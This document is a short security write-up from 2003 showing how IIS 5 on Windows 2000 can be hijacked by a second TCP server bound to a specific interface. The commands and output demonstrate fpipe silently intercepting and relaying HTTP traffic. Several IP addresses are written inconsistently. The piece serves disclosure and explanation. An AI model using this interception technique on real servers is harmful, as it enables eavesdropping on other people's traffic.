Even if Microsoft introduced the SO_EXCLUSIVEADDRUSE socket option in Windows NT 4.0 Service Pack 4, it seems that it was not used in some Microsoft application servers.
For instance, the HTTP server part of Internet Information Services (IIS) 5, shipped with Windows 2000, listens by default on all network interfaces on ports 80 and 443. It is possible to hijack the HTTP server of IIS 5 with a TCP server bound to the IP address of a specific interface.
Even more interesting, when a TCP server listens on all interfaces, it is possible to silently intercept TCP traffic, binding a second TCP server to intercept trafic and redirecting to the loopback address, to finally deliver date to the hijacked server (thanks to Franck Davy for suggesting this).
On a Windows 2000 server with IIS 5, the HTTP service listens on all interfaces:
C:\WINNT\>netstat -an | find "80" TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
Using fpipe, a second TCP server is bound to IPv4 address 188.8.131.52 and configured to redirect traffic to the loopback address (127.0.0.1), with TCP port 80 as destination:
C:\WINNT\>fpipe -l 80 -r 80 -i 184.108.40.206 127.0.0.1 -v FPipe v2.1 - TCP/UDP port redirector. Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com Listening for TCP connections on 220.127.116.11 port 80
Using socat to send an HTTP query:
jbm@garbarek ~> socat - tcp4:18.104.22.168:80 GET / HTTP/1.1 Host: localhost
The second server receives the connection on port 80 and redirect data to the IIS 5 server, using 127.0.0.1 as destination address:
Connection accepted from 22.214.171.124 port 1077 Attempting to connect to 126.96.36.199 port 1077 Pipe connected: In: 188.8.131.52:1077 --> 184.108.40.206:80 Out: 220.127.116.11:33014 --> 127.0.0.1:80 15 bytes received from inbound connection 16 bytes received from inbound connection 1 bytes received from inbound connection 273 bytes received from outbound connection Outbound connection lost Closing outbound connection Closing inbound connection Quit signal detected. Shutting down...
The TCP client finally receives data sent by the IIS5 server:
HTTP/1.1 404 Object Not Found Server: Microsoft-IIS/5.0 Date: Thu, 22 May 2003 16:25:32 GMT Connection: close Content-Type: text/html Content-Length: 111 [...]